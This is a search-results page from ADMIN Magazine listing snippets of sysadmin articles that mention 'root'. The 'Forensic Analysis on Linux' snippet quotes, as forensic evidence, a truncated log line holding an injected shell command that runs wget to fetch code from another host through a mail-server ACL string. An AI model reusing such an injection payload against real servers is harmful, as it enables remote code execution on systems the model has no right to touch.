Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (641)
  • Article (165)
  • News (41)
  • Blog post (1)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ... 85 Next »

15%
Finding cracks with Nmap, Portbunny, and Nessus
30.11.2025
Home »  Archive  »  2010  »  Issue 0: Active...  » 
Fotoflash, Fotolia.com
systems, a program that wants to open a well-known port has to run with root privileges; this explains why ports 0 through 1023 are often referred to as privileged ports . Ports 1024 through 49
15%
Risk mitigation for Active Directory
27.05.2025
Home »  Archive  »  2025  »  Issue 87: Light...  » 
Photo by cdd20 on Unsplash
certificate authority (CA) that can be traced back to the trusted roots of the DC for the validation of smart card certificates. Instead, it uses a special NTAuth certificate store (Figure 1). An enterprise CA
15%
Web applications with Julia
26.01.2025
Home »  Archive  »  2025  »  Issue 85: Monit...  » 
Lead Image © sony sivanandan, 123RF.com
of accomplishing this added security is to confine the Julia process on the server to some type of virtual environment, such as a container from which it is impossible to see the machine's root filesystem. The use
15%
The latest developments in Open-Xchange 6.20
30.11.2025
Home »  Archive  »  2011  »  Issue 4: Secure...  » 
© Robert Byron, Fotolia.com
&1, for example, will be familiar with the software under the name of 1&1 Webmail and 1&1 MailXchange. On top of the 2.5 million 1&1 customers, another 1.4 million users with Host Europe, and 40,000 root and v
15%
The RADOS Object Store and Ceph Filesystem
24.04.2012
Home »  HPC  »  Articles  » 
. This could mean adding these names to your /etc/hosts file. Additionally, you need to be able to log in to all of the RADOS nodes as root later on for the call to mkcephfs , and root needs to be able to call
15%
TinyDNS
02.03.2012
Home »  Articles  » 
 
the name server will listen for queries (look for the IP files under root/   if you need to change it in the future). Believe it or not, that almost takes care of the installation. As an example of how
15%
GlusterFS
27.03.2012
Home »  HPC  »  Articles  » 
and should install them in this order, working as root: rpm -Uvh glusterfs-core-Version.x86_64.rpm rpm -Uvh glusterfs-fuse-Version.x86_64.rpm rpm -ivh glusterfs-geo-replication-Version.x86_64.rpm Typing
15%
Forensic Analysis on Linux
30.04.2013
Home »  Articles  » 
=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string "pl 192.168.56.1 4444; \ sleep 1000000'"}} $ {run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c
15%
Kickstack: OpenStack with Puppet
22.06.2014
Home »  Articles  » 
VMs access to the outside world. Auth Node This node operates Keystone, the ID service, which is something like the root service in OpenStack – without it, the other components cannot
15%
Setting up an OpenNebula Cloud
05.09.2011
Home »  CloudAge  »  Articles  » 
 
INITRD = "/boot/initrd.img-2.6.32-24-generic", # initrd to use 07 ROOT = "sda1", #Root partition 08 BOOT = hd #boot form harddisk 09 ] 10 DISK = [ 11 SOURCE = "/opt

« Previous 1 ... 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ... 85 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2026 Linux New Media USA, LLC – Legal Notice